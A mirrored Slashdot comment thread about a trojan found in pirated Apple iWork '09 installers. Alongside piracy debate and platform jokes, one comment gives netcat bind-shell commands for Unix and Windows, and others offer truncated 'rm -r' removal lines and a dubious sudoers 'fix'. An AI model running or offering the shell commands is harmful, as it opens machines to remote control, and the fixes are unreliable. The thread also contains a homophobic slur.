Slashdot Mirror
Trojan Hides In Pirated Copies of Apple iWork '09
CWmike writes "Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites contain a Trojan horse that hijacks Macs and leaves them open to further attack, a security company said yesterday. The 'iServices.a' Trojan hitchhikes on iWork '09's installer, said Intego, which makes Mac security software. 'The installer for the Trojan horse is launched as soon as a user begins the installation of iWork, following the installer's request of an administrator password,' Intego said in a warning. Once installed, the Trojan "phones home" to a malicious server to notify the hacker that the Mac has been compromised, and to await instructions."
The iPwn!
Women are like electronics: you don't know how damaged they are until you try to turn them on.
Why not download the Trial version and unlock it with one of the million serials out there?
Faster! Faster! Faster would be better!
It's easier to just download the trial version and look for the serial number. This is yet another thing which Apple makes easier and more secure :)
Sometimes I wonder if companies that create security software aren't sometimes guilty of either creating or funding the creation of viruses, trojans, worms, &c. simply to justify their own existence.
Is that cynical?
But...but...butbutbut, Macs can't get viruses and Trojans, because they're so secure!!!
</sarcasm>
"City hall" in German is "Rathaus" Kinda explains a few things......
If only Apple hadn't stripped out the DRM this would have never happened!
Haven't you seen the ads? Mac OS X doesn't get viruses. This story is a complete fabrication, bankrolled by Microsoft, created to instil fear in The Perfect Operating System. Please link real stories next time.
That it is the easiest trojan to use ever. Bravo, Apple.
Since when does a PEBKAC error count as news? If you're idiot enough to install pirated software then you deserve what you get - and absolutely nobody can protect a computer system against user stupidity.
Power does not corrupt - power attracts the corrupt.
Mac: Hi, I'm a Mac
PC: And I'm a PC.
Mac: I'm sleeker, stronger, and more attractive!
PC: Well, I know much more people than you do.
Mac: Look at my physique, I'm the perfect specimen of health!
PC: You gave me chlamydia last month.
Mac: What?!
PC: I'm lucky my doctor saw it and prescribed antibiotics for it. All clean! Have you been tested lately?
Mac: No, and you said you wouldn't tell anybody!
PC: It was going to happen sooner or later. We had to hook up sometime, right?
Mac: Don't let anybody find out about this! My reputation will be ruined!
PC: Dude, everybody already knew you were a faggot. I just regret letting you in my room that night.
Mac: Now everybody's gonna know! What an I supposed to tell them?!
PC: Uh, you're an arrogant gay?
If Apple were evil they could deliberately put hacked versions onto filesharing sites. More seriously, this is a good example of why even pirating software is really not a good idea. Unless you know exactly who you are downloading from you don't know what you are getting. Very little commercial software has nice little checksums or hashes that are easily available for you to verify. Downloading pirated software is a bit like having unprotected sex with a stranger. It might feel real good now, but you are going to regret it later.
haha
But like many a Windows trojan/malware that relied on user intervention to get its foot in the door, I don't see why this cannot be blamed on Apple's "sloppy code" (to draw a parallel with the same things that get blamed on Microsoft).
A Unix-like system with a root account is not superior to an NT box, even when used by someone who runs under a non-privileged account but cannot be bothered to exercise some damn common sense wrt what they put on their computers.
As their numbers grow, I expect masses of stupid Apple users (probably the same stupid Windows users that migrated to OS X to be "safe") to do things like enter their root password into browser add-ons because they are asked for it, and download "cool" screensavers and pirated software like this, loaded with malware. Membership in botnets cannot be far behind at that point.
And then when Apple machines get hit by exploits to vulnerabilities that have been patched for three months which users can't be bothered to install updates for, all will be good.
And guess what OS will be next up.
Late last year, in fact, when Apple revised an online recommendation that Mac users consider running antivirus software, the move drew lots of attention.
Most antivirus programs on os x actually scan for Windows viruses only, and are totally useless against almost all os x malware. The only software vendor that I know of that makes anti-malware programs for native OS X malware is Intego. Intego make great software and are mentioned in this article, but what about all the mac users out there who get a mac virus scanner that only scans for windows viruses? A lot of people are being duped.
w4r3z n00bz abound in every user base, Mac is no exception. Hooray for learning experiences!
"TrojanDevKit.DMG" - available only to 'special developers'. From the EULA: "Only to be used on occasions when our IP is getting ripped to the point we get irritated. Break glass in case of emergency."
If your only tool is a hammer, every problem becomes a nail.
Overall, 98% of the owned systems are Windows. Cracking into *nix with a virus is just not going to occur (though I see LOADS of attempts at ssh and lots of .cfm, .asp and .php attacks going on). Instead, it has to be something that fools will load in. Iworks is one of them.
Micro$oft is the whipping boy.
Granted they make it easy (to install malware and whip them.)
John McAfee 'It was like that time I hired that Bangkok prostitute; to do my taxes, while I fucked my accountant'
Lol viruses? Get a Mac. Oh wait.
I always thought that torrents seem an ideal mechanism to spread viruses. If this becomes epidemic it could very well totally cripple the P2P community.
With pirated software this risk can be mitigated if you have a verified trustworthy hash code of the untempered original version. On the other hand if there is an exploitable vulnerability in a popular codec movie torrents could become a massive security problem (obviously not for enterprise computing but the already more vulnerable home user).
You really can't trust pirates anymore!
As long as there are crackers without girlfriends in the world, they don't need to.
I propose starting a new anti-virus company that will focus on dates for crackers rather than OS security.
greed@All_Evils:~#
Software from an untrusted source is not secure, news at 11!
Seriously, why would you think that any pirated software is secure? Hell, it's provided by people who don't mind stealing software. What makes you think they would not want to steal from you?
I don't steal software, ever, but it is a well known fact (among Mac users) that iWork can be downloaded direct from Apple. All it takes is a valid serial number and you are ready to go. Why the heck would anybody bother firing up a torrent?
Let's have this independently verified. I'm sick unto death of Intego releasing these stupid "threat" notices, trying to scare people into buying their shitware.
You know, if the RIAA had just used this approach from the beginning, instead of suing people at random, they could have avoided a ton of bad PR. Just another reason why Apple is smarter than other companies.
Hear recorded Slashdot headlines on your phone! New service beta testing. Just call (248) 434-5508
Software programs downloaded from third-party pirate sites can contain trojans.
Film at 11!
It's not like trojans are unusual, they are commonplace, and a risk for every computer user who thinks about running things from untrusted sources.
I'm a lot more concerned about the legitimate and semi-legitimate companies that install spyware and malware with their software. At least when this kind of crap goes up on a torrent site, there are 7 posts within an hour or two warning other users that there's malware in the program. Whereas when a Microsoft or Sony sets you up the bomb they spend months denying there's a problem first. That still doesn't excuse the lazy user who installs whatever without checking it out first, but I don't think it's accurate to say that "pirated" software is inherently less secure.
but now they've managed to embed Windows inside a Mac program? Amazing.
Please execute the following as admin, type your password as requested:
sudo nc -l -p1234 -d -e bash-L
on windows:
nc -l -p1234 -d -e cmd.exe -L
Oh noes, I ownz yoo box now.
(similar things can be done with reverse ssh tunneling but you get the point)
Custom electronics and digital signage for your business: www.evcircuits.com
SEE? SEE?!! Macs get viruses too! TAKE THAT MAC!!!
PCs aren't the only ones that get viruses now!
Their alert, unlike every other antivirus company alert, does not tell you how to remove the trojan.
Nice.
VLC FOR MAC IS DYING! IF YOU DEVELOP, PLEASE SAVE IT!!
You'll first have to replace the default install of netcat with one that was compiled with the GAPING_SECURITY_HOLE flag set.
http://www.rootstrikers.org/
this just proves that Apple should screen their warez.
THL phish sticks
I am using Ubuntu and pretty sure this kind of trojan wouldn't work! Mac has a pretty "case" with nice looking silver color but I don't think the OS and software parts are good enough, so Mac is not my cup of tea.
Not to troll, but as far as I'm concerned anyone who pirates software deserves it...
Any sect, cult, or religion will legislate its creed into law if it acquires the political power to do so.
Somehow, they got the exclamation mark upside down.
$ sudo -s
# rm -r
# rm
# rm
# rm -r
# killall -9 iWorkServices
Not that hard; just a binary setup to run as a service.
Mod parent informative.
VLC FOR MAC IS DYING! IF YOU DEVELOP, PLEASE SAVE IT!!
Apple doesn't get viruses, EVER !!!!! It's so secure !!!!!
There, can I join the iFanboi club now ?
That people willing to rip off software would be as unethical to install hijacking trojans to screw over other software pirates. I am just so shocked by this turn of events.
“Common sense is not so common.” — Voltaire
Can't beat free, and the chances of getting infected or trojaned are usually small. Load in a VM and check it out there of course. Foolish not to, so yes, look that gift horse in the mouth, of course.
I just wish someone would do this for the Linux world. I've tried nearly every ISO download under "Applications -> Unix" on The Pirate Bay, but everything seems to be *legal*.
Why then does OpenOffice.org tell us not to use version which are not from there very own server? Legal does not mean free of malware ad-ons.
The truth is: OpenSource makes is easier to attach malware to a download.
Note that I am all in favour of OpenSource - but one should not close his / her eyes from the downside.
Is it somehow uncommon for pirated software to contain a trojan?
-- 'The' Lord and Master Bitman On High, Master Of All
What you describe is a Worm;
1) A Virus is a self replication pice of software.
2) A Worm wiggles it's way into your mashine.
3) A Trojan is hides inside some other software to get into your mashine.
Of course combinations are possible - There are quite a few Viruses which are also Worms.
iWork shouldn't need admin password to install.
It's just a user level app.
Should be drag and drop install for non admin users.
Making every application need an "installer" is not a mac like experience, and reduces security by making users think typing in admin passwords is normal when installing user apps.
>We all plan to buy Photoshop.
Right after we figure out how to get apt-get to accept our CC#..
FRA: STFU GTFO
Apple decides to release the software without 'protection' and announces the next day that there might be infected versions out on the internet.
From what I recall, installing a 'non-official' copy has always come with a risk of 'undocumented extras'.
iWonder who released the 'bugged' version of iWork...
"I was in love with a beautiful blonde once, dear. She drove me to drink. It's the one thing I am indebted to her for."
Some pirated software contains a trojan. Hardly worth mentioning.
I'm not agreeing. Trojans require that gullible users download them and install them (or a machine which was already compromised by a worm).
The truth is: OpenSource makes is easier to attach malware to a download.
Yes, you could make a "Vubuntu - Ubuntu with Virus edition". But then, how do you get people to download it ?
It's not as if the original was expensive anyway.
You can get easily a genuine Ubuntu from the original web site, for free and using whatever suites you the best : either HTTP/FTP download or P2P from Bittorrent.
Why the hell would an average user need to download his/her copy from some shady "aLl w4r3z r us !" website ?
Trojan on commercial software works because free-riders can't get the original genuine software and have to download it from "somewhere else". They are at the mercy of the people running the somewhere else.
OTOH, Linux- BSD- and other OSS users can get everything they need (minus binary drivers) from the original distributor which they can trust.
The only few point of entrances are :
1. a couple of USA-based small distributions. Thanks to the wonderful laws you have at you side of the big pond, simple everyday actions (like watching a GIF picture once upon a time or listening to an MP3 song more recently) are blocked. This makes the USA-based distribution unable to ship the necessary software out of the box.
At least, big players have nice not-based-in-the-USA special repositories, where the user can get genuine codecs needed (all Debian based distros have "non-US" repositories).
But probably there are smaller player who just don't (can't) give out the codecs themself, requiring users to go to various third party sources. Probably one could setup a bogus repository with "codecs-bundled-with-trojans".
2. binary commercial software, which user have to manually download and install. And anyway with that we're back into the proprietary situation of Mac OS X and Windows. Once again proof that you'd have to stick to OSS from official trusted source to avoid being trojaned to the bone.
As a small - and mostly harmless - example is Skype. Its network isn't open, you can't find an opensource software from your trusted distributor which can interconnect with the Skype network.
So, lots of users choose to download the software from Skype's website and to install it manually. There's no breach of security : the users willingly typed the password to install the software.
Yet, according to Skype's EULA, Skype reserves the right to wiretap you conversation if asked to collaborate by government officials. That falls under the category "spyware/malware/etc..." for some users. Linux was supposed to be a malware-free environment, but the users ended up with a spy on their computer - because they had to get a non-open software from a third party.
At least, with skype, the company is honest and clearly state this in the EULA.
But there could be much more shady things lurking in other binary-only softwares.
"Sufficiently advanced satire is indistinguishable from reality." - [Tips: 1DrYakQDKCQ6y52z6QbnkxHXAocMZJE61o ]
Load in a VM and check it out there of course.
Wow, you're generous. You're assuming that the user actually knows what to be looking for in the first place.
I only please one person per day. Today is not your day. Tomorrow isn't looking good either. - Scott Adams
the groups who actually bring you the releases (fairlight, razor1911, etc.) take what they do very seriously, and besides the occasional false positive (ahem, AVG), wouldn't dream of including malware in the releases; they have rules of engagement that they follow very closely and would be ridiculed in IRC and publicly lambasted in NFOs for years.
eDonkey and LimeWire downloading is the equivalent of walking into a dark alley in the Bronx with a sign asking "Any crack for sale?"
body massage!
I wish every pirate software on earth came with built-in viruses so people are forced to use FOS software. (maybe I can create a team to work on that(but only for windows(i hate windows users!)))
4 - A robot may not masturbate, except where such action would conflict with the Second Law.
Correct? Or am I dreaming?
RS
Shoes for Industry. Shoes for the Dead.
Im running windows...
Thanks to file sharing, I purchase more CDs
Thanks to the RIAA, I buy them used...
Someone beat me to it. Seriously, it's not as if iWork is that expensive, and there are free alternatives. Why steal it?
Make love, not reality television.
"Pirated copies of Apple's new iWork '09 suite that are now available on file-sharing sites"
.. :)
I wonder who put it up there as now I'll have to go out and buy an AV suite
davecb5620@gmail.com
But then, how do you get people to download it ?
Easy, you reserve www.oenoffice.org, www.opnoffice.org, www.opeoffice.org www.openffice.org and www.openofice.org and offer the applications for download there.
Remember, I am in vafour of OpenSource - but I do not close my eyes in front of potential danger.
Why the hell would an average user need to download his/her copy from some shady "aLl w4r3z r us !" website ?
No reason at all, but he might download from www.ubntu.org.
Martin
But then how will I describe it when more than one virus infects my boxen?
1. Trojan != Virus
2. Social engineering is the best way to hack/infect a system
3. Downloading software illegally may cause you problems.
Not exactly newsworthy, but I appreciate the info should I decide to nab iWork myself. I suppose the buzz is because this is happening to OS X and Mac users.
I will shred my adversaries. Pull their eyes out just enough to turn them towards their mewing, mutilated faces. Illyria
It would be nice if the summary also gave a link or hint on a fix....
Which keys do I delete with regedit?
Even when said gift horse is actually a trojan horse? :)
DNA -- National Dyslexic Association
I work in systems administration and tech support. I try and use free tools whenever possible. Due to stupid licensing schemes and propriety interoperability problems, this is not always possible. How is it not good for my industry (tech support and systems administration) to not use whatever tool I think will work the best? Why is it the right of the tool creator to tell me what I can and cannot do with his tools? The purpose of my industry is solving problems using tools.
So if I give credit and say for instance, that norton ghost is a great product! that will do in your mind? "the moral law of paying *your* due" is a cute way of rationalizing your copyrigth infringment of music. The only people who think that programs and music differ, when it comes to copyright infringement, are software developers.
This hypocrisy of devs always gives me a good laugh.
I should also note, that if it were possible, through the use of nanoforges or other atomic compilers, to create cars, food, computers, etc without paying anyone a cent, I would have no problems doing that either. That is the future. None of this artificial scarcity crap.
As a potential lottery winner, I totally support tax cuts for the wealthy
http://www.macupdate.com/info.php/id/30265/iworkservices-trojan-removal-tool
This is the easiest way to prevent any app/process from piggy-backing onto a legit process that has queried the system as to whether we have an Internet connection:
open the sudoers file, located here: /etc/sudoers
add the following:
Defaults:ALL timestamp_timeout=0
Save. Done.
OS X comes with a default 5 minute "window" on the use of an admin to get privilage escalation. When that window is shrunk to zero, that means that the escalation is disabled instantly. All processes are serial, so two processes cannot occur at the same moment in time. Period.
Running as a non-admin user is okay, but the timestamp is what really has to go.
Why don't these people download the real copy from Apple?
Ariel GreenLeaf Imaging